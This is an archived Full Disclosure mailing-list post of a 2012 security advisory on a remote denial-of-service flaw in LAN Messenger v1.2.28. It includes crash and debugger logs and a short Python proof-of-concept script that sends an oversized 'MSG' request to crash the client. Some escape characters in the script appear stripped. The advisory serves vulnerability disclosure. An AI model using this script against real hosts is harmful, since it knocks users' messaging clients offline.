Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

LAN Messenger v1.2.28 - Denial of Service Vulnerability
From: Research <research () vulnerability-lab com>
Date: Wed, 02 May 2012 00:33:58 +0200

Title:
======
LAN Messenger v1.2.28 - Denial of Service Vulnerability


Date:
=====
2012-05-01


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=537


VL-ID:
=====
537


Introduction:
=============
LAN Messenger is a free and open source cross-platform instant messaging application for communication over a 
local network. It does not require a server. A number of useful features including event notifications, file transfer 
and message logging are provided.

(Copy of the Website: http://lanmsngr.sourceforge.net )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a remote Denial of Service vulnerability on LAN Messenger v1.2.28.


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Remote Denial of Service vulnerability is detected on LAN Messenger <= v1.2.28 (current version) for Windows. 
The vulnerability is triggered when sending a malformed initiation request to the client.

The initiation consists of 3 parts:
MSG + Number + UserID

As an example:
0000   4d 53 47 30 30 30 43 32 39 43 39 43 32 39 32 41  MSG000C29C9C292A
0010   64 6d 69 6e 69 73 74 72 61 74 6f 72              dministrator

When appending at least 8190 (Tested on WinXP) or more bytes to the \\\\\\\\\\\\\\\"MSG\\\\\\\\\\\\\\\" string, a C++ 
Exception is triggered.

Windows-Crash-Log:
Problemsignatur:
  Problemereignisname:  APPCRASH
  Anwendungsname:       lmc.exe
  Anwendungsversion:    1.2.2.8
  Anwendungszeitstempel:        4f769831
  Fehlermodulname:      QtCore4.dll
  Fehlermodulversion:   4.8.0.0
  Fehlermodulzeitstempel:       4ee593bc
  Ausnahmecode: 40000015
  Ausnahmeoffset:       0018c779
  Betriebsystemversion: 6.1.7601.2.1.0.274.10
  Gebietsschema-ID:     1031
  Zusatzinformation 1:  c210
  Zusatzinformation 2:  c210baa76e54b5e894c7f7a96bc23eb7
  Zusatzinformation 3:  e02f
  Zusatzinformation 4:  e02f83123de2633d9cdeb87470e7443f

Application Crash-Log:
[2012.04.28 20:49:12] New connection received
[2012.04.28 20:49:12] Accepted connection from user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[2012.04.28 20:49:12] Sending public key to user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[2012.04.28 20:49:12] Connection to user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA lost

Debug-Log:
ModLoad: 00400000 0059a000   C:/Programme/LAN Messenger/lmc.exe
ModLoad: 7c910000 7c9c9000   C:/WINDOWS/system32/ntdll.dll
ModLoad: 7c800000 7c908000   C:/WINDOWS/system32/kernel32.dll
ModLoad: 66200000 6621f000   C:/Programme/LAN Messenger/lmcapp2.dll
ModLoad: 6fbc0000 6fbc7000   C:/Programme/LAN Messenger/mingwm10.dll
ModLoad: 77be0000 77c38000   C:/WINDOWS/system32/msvcrt.dll
ModLoad: 6e940000 6e950000   C:/Programme/LAN Messenger/libgcc_s_dw2-1.dll
ModLoad: 6a1c0000 6a47c000   C:/Programme/LAN Messenger/QtCore4.dll
ModLoad: 77da0000 77e4a000   C:/WINDOWS/system32/ADVAPI32.DLL
ModLoad: 77e50000 77ee3000   C:/WINDOWS/system32/RPCRT4.dll
ModLoad: 77fc0000 77fd1000   C:/WINDOWS/system32/Secur32.dll
ModLoad: 774b0000 775ee000   C:/WINDOWS/system32/OLE32.dll
ModLoad: 77ef0000 77f39000   C:/WINDOWS/system32/GDI32.dll
ModLoad: 7e360000 7e3f1000   C:/WINDOWS/system32/USER32.dll
ModLoad: 71a10000 71a27000   C:/WINDOWS/system32/WS2_32.DLL
ModLoad: 71a00000 71a08000   C:/WINDOWS/system32/WS2HELP.dll
ModLoad: 65100000 65ab4000   C:/Programme/LAN Messenger/QtGui4.dll
ModLoad: 76350000 7639a000   C:/WINDOWS/system32/COMDLG32.DLL
ModLoad: 5d450000 5d4ea000   C:/WINDOWS/system32/COMCTL32.dll
ModLoad: 7e670000 7ee91000   C:/WINDOWS/system32/SHELL32.dll
ModLoad: 77f40000 77fb6000   C:/WINDOWS/system32/SHLWAPI.dll
ModLoad: 76330000 7634d000   C:/WINDOWS/system32/IMM32.DLL
ModLoad: 770f0000 7717b000   C:/WINDOWS/system32/OLEAUT32.DLL
ModLoad: 76af0000 76b1e000   C:/WINDOWS/system32/WINMM.DLL
ModLoad: 72f70000 72f96000   C:/WINDOWS/system32/WINSPOOL.DRV
ModLoad: 6ff00000 70041000   C:/Programme/LAN Messenger/QtNetwork4.dll
ModLoad: 10000000 10113000   C:/Programme/LAN Messenger/libeay32.dll
ModLoad: 78520000 785c3000   
C:/WINDOWS/WinSxS/x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4148_x-ww_d495ac4e/MSVCR90.dll
ModLoad: 005f0000 0193a000   C:/Programme/LAN Messenger/QtWebKit4.dll
ModLoad: 77bd0000 77bd8000   C:/WINDOWS/system32/VERSION.dll
ModLoad: 6ed40000 6eda7000   C:/Programme/LAN Messenger/QtXml4.dll
ModLoad: 773a0000 774a3000   
C:/WINDOWS/WinSxS/x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202/comctl32.dll
ModLoad: 5de80000 5de88000   C:/WINDOWS/system32/rdpsnd.dll
ModLoad: 76300000 76310000   C:/WINDOWS/system32/WINSTA.dll
ModLoad: 597d0000 59825000   C:/WINDOWS/system32/NETAPI32.dll
ModLoad: 76bb0000 76bbb000   C:/WINDOWS/system32/PSAPI.DLL
ModLoad: 746a0000 746ec000   C:/WINDOWS/system32/MSCTF.dll
ModLoad: 75250000 7527e000   C:/WINDOWS/system32/msctfime.ime
ModLoad: 5b0f0000 5b128000   C:/WINDOWS/system32/uxtheme.dll
ModLoad: 68f00000 68f1a000   C:/Programme/LAN Messenger/imageformats/qgif4.dll
ModLoad: 6bdc0000 6bdd9000   C:/Programme/LAN Messenger/imageformats/qico4.dll
ModLoad: 645c0000 6460c000   C:/Programme/LAN Messenger/imageformats/qjpeg4.dll
ModLoad: 632c0000 63322000   C:/Programme/LAN Messenger/imageformats/qtiff4.dll
ModLoad: 76620000 766d6000   C:/WINDOWS/system32/userenv.dll
ModLoad: 76d20000 76d39000   C:/WINDOWS/system32/iphlpapi.dll
ModLoad: 77cd0000 77d03000   C:/WINDOWS/system32/netman.dll
ModLoad: 76d00000 76d18000   C:/WINDOWS/system32/MPRAPI.dll
ModLoad: 77c90000 77cc2000   C:/WINDOWS/system32/ACTIVEDS.dll
ModLoad: 76dd0000 76df5000   C:/WINDOWS/system32/adsldpc.dll
ModLoad: 76f20000 76f4d000   C:/WINDOWS/system32/WLDAP32.dll
ModLoad: 76ad0000 76ae1000   C:/WINDOWS/system32/ATL.DLL
ModLoad: 76e40000 76e4e000   C:/WINDOWS/system32/rtutils.dll
ModLoad: 71b70000 71b83000   C:/WINDOWS/system32/SAMLIB.dll
ModLoad: 778f0000 779e4000   C:/WINDOWS/system32/SETUPAPI.dll
ModLoad: 763a0000 7654a000   C:/WINDOWS/system32/netshell.dll
ModLoad: 76bc0000 76bef000   C:/WINDOWS/system32/credui.dll
ModLoad: 5f8f0000 5f8fa000   C:/WINDOWS/system32/dot3api.dll
ModLoad: 71260000 71266000   C:/WINDOWS/system32/dot3dlg.dll
ModLoad: 72760000 72788000   C:/WINDOWS/system32/OneX.DLL
ModLoad: 76f10000 76f18000   C:/WINDOWS/system32/WTSAPI32.dll
ModLoad: 77a50000 77ae6000   C:/WINDOWS/system32/CRYPT32.dll
ModLoad: 77af0000 77b02000   C:/WINDOWS/system32/MSASN1.dll
ModLoad: 6db40000 6db62000   C:/WINDOWS/system32/eappcfg.dll
ModLoad: 76020000 76085000   C:/WINDOWS/system32/MSVCP60.dll
ModLoad: 47700000 4770e000   C:/WINDOWS/system32/eappprxy.dll
ModLoad: 76ea0000 76edc000   C:/WINDOWS/system32/RASAPI32.dll
ModLoad: 76e50000 76e62000   C:/WINDOWS/system32/rasman.dll
ModLoad: 76e70000 76e9f000   C:/WINDOWS/system32/TAPI32.dll
ModLoad: 408b0000 40996000   C:/WINDOWS/system32/WININET.dll
ModLoad: 02a30000 02a39000   C:/WINDOWS/system32/Normaliz.dll
ModLoad: 452e0000 45413000   C:/WINDOWS/system32/urlmon.dll
ModLoad: 40f50000 4113b000   C:/WINDOWS/system32/iertutil.dll
ModLoad: 72fa0000 72fb0000   C:/WINDOWS/system32/WZCSAPI.DLL
ModLoad: 7db20000 7dbac000   C:/WINDOWS/system32/WZCSvc.DLL
ModLoad: 76cf0000 76cf4000   C:/WINDOWS/system32/WMI.dll
ModLoad: 7d4c0000 7d4e2000   C:/WINDOWS/system32/DHCPCSVC.DLL
ModLoad: 76ee0000 76f07000   C:/WINDOWS/system32/DNSAPI.dll
ModLoad: 745c0000 745cb000   C:/WINDOWS/system32/EapolQec.dll
ModLoad: 61900000 61916000   C:/WINDOWS/system32/QUtil.dll
ModLoad: 5e200000 5e310000   C:/WINDOWS/system32/ESENT.dll
ModLoad: 68000000 68036000   C:/WINDOWS/system32/rsaenh.dll
ModLoad: 03cc0000 03cd3000   C:/WINDOWS/system32/PrxerDrv.dll
ModLoad: 719b0000 719f0000   C:/WINDOWS/system32/mswsock.dll
ModLoad: 66710000 66769000   C:/WINDOWS/system32/hnetcfg.dll
ModLoad: 719f0000 719f8000   C:/WINDOWS/System32/wshtcpip.dll
(a64.6ec): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
eip=7c91120e esp=03f6ffcc ebp=03f6fff4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
7c91120e cc              int     3
0:004> g
(a64.e8c): C++ EH exception - code e06d7363 (first chance)
eax=6fbc1350 ebx=00000000 ecx=003f2430 edx=003f2430 esi=7c91de6e edi=00000003
eip=7c91e514 esp=0022d004 ebp=0022d100 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!KiFastSystemCallRet:
7c91e514 c3              ret

Stack-Trace:
ChildEBP RetAddr  
0022d000 7c91de7a ntdll!KiFastSystemCallRet
0022d004 7c81cace ntdll!ZwTerminateProcess+0xc
0022d100 7c81cb26 kernel32!_ExitProcess+0x62
0022d114 77c09d45 kernel32!ExitProcess+0x14
0022d120 77c09e78 msvcrt!__crtExitProcess+0x32
0022d130 77c09eac msvcrt!_cinit+0xee
0022d144 77c0523b msvcrt!_exit+0x12
0022d18c 77c06bc1 msvcrt!raise+0xae
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Programme/LAN Messenger/QtCore4.dll - 
0022d1e8 6a32d615 msvcrt!abort+0xe
WARNING: Stack unwind information not available. Following frames may be wrong.
0022d208 6a34f667 QtCore4!ZN10QTextCodec12codecForNameEPKc+0x71
0022d228 6a350ee2 QtCore4!ZNK7QPointF7toPointEv+0x33b
0022d248 6a2c9ccb QtCore4!ZeqRK6QRectFS1_+0x17aa
0022d298 6a2f0a85 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0x7b
0022d318 7e368734 QtCore4!ZN21QEventDispatcherWin3221registerEventNotifierEP17QWinEventNotifier+0x349
0022d354 7e368816 USER32!InternalCallWinProc+0x28
0022d3bc 7e3689cd USER32!UserCallWinProcCheckWow+0x150
0022d41c 7e368a10 USER32!DispatchMessageWorker+0x306
0022d42c 7e377721 USER32!DispatchMessageW+0xf
0022d464 7e3749c4 USER32!DialogBox2+0x15a
0022d48c 7e38a956 USER32!InternalDialogBox+0xd0
0022d74c 7e38a2bc USER32!SoftModalMessageBox+0x938
0022d89c 7e3b63fd USER32!MessageBoxWorker+0x2ba
0022d8f4 7e3b64a2 USER32!MessageBoxTimeoutW+0x7a
0022d928 7e3a0877 USER32!MessageBoxTimeoutA+0x9c
0022d948 7e3a082f USER32!MessageBoxExA+0x1b
0022d964 77c09300 USER32!MessageBoxA+0x45
0022d998 77c0b127 msvcrt!__crtMessageBoxA+0xf6
0022dba0 77c06bba msvcrt!_NMSG_WRITE+0x19e
0022dbf8 6a32d615 msvcrt!abort+0x7
0022dc18 6a34f667 QtCore4!ZN10QTextCodec12codecForNameEPKc+0x71
0022dc38 6a350ee2 QtCore4!ZNK7QPointF7toPointEv+0x33b
0022dc58 6a2c9ccb QtCore4!ZeqRK6QRectFS1_+0x17aa
0022dca8 6a2f0a85 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0x7b
0022dd28 7e368734 QtCore4!ZN21QEventDispatcherWin3221registerEventNotifierEP17QWinEventNotifier+0x349
0022dd60 7e368816 USER32!InternalCallWinProc+0x28
0022ddc8 7e3689cd USER32!UserCallWinProcCheckWow+0x150
0022de28 7e368a10 USER32!DispatchMessageWorker+0x306
0022de38 6a2f3505 USER32!DispatchMessageW+0xf
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Programme/LAN Messenger/QtGui4.dll - 
0022fc48 6517445c QtCore4!ZN21QEventDispatcherWin3213processEventsE6QFlagsIN10QEventLoop17ProcessEventsFlagEE+0x575
0022fcb8 6a2c898e QtGui4!ZN19QApplicationPrivate14enterModal_sysEP7QWidget+0x464
0022fce8 6a2c8d93 QtCore4!ZN10QEventLoop13processEventsE6QFlagsINS_17ProcessEventsFlagEE+0x36
0022fd38 6a2cd50f QtCore4!ZN10QEventLoop4execE6QFlagsINS_17ProcessEventsFlagEE+0x143
*** ERROR: Module load completed but symbols could not be loaded for C:/Programme/LAN Messenger/lmc.exe
0022fd78 0044f1c0 QtCore4!ZN16QCoreApplication4execEv+0x8b
0022feb8 004cf005 lmc+0x4f1c0
0022fef8 004cecc8 lmc+0xcf005
0022ff78 0040124b lmc+0xcecc8
0022ffb0 004012b8 lmc+0x124b
0022ffc0 7c817077 lmc+0x12b8
0022fff0 00000000 kernel32!BaseProcessStart+0x23


Proof of Concept:
=================
The denial of service vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

#!/usr/bin/python
 
from struct import pack
import socket,sys
import os

target="192.168.0.1"
port=50000

junk = "x41" * 8190 

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respondn"
    sys.exit(0)

print "[*] Sending malformed request..."
s.send("x4dx53x47" + junk)

print "[!] Exploit has been sent!n"
s.close()


Risk:
=====
The security irsk of the remote denial of service vulnerability is estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team]  -    Julien Ahrens  (MrTuxracer)  [www.inshell.net]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all 
warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss 
of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such 
damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from 
Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, 
including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

                                                Copyright © 2012 Vulnerability-Lab




-- 
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research () vulnerability-lab com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • LAN Messenger v1.2.28 - Denial of Service Vulnerability Research (May 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault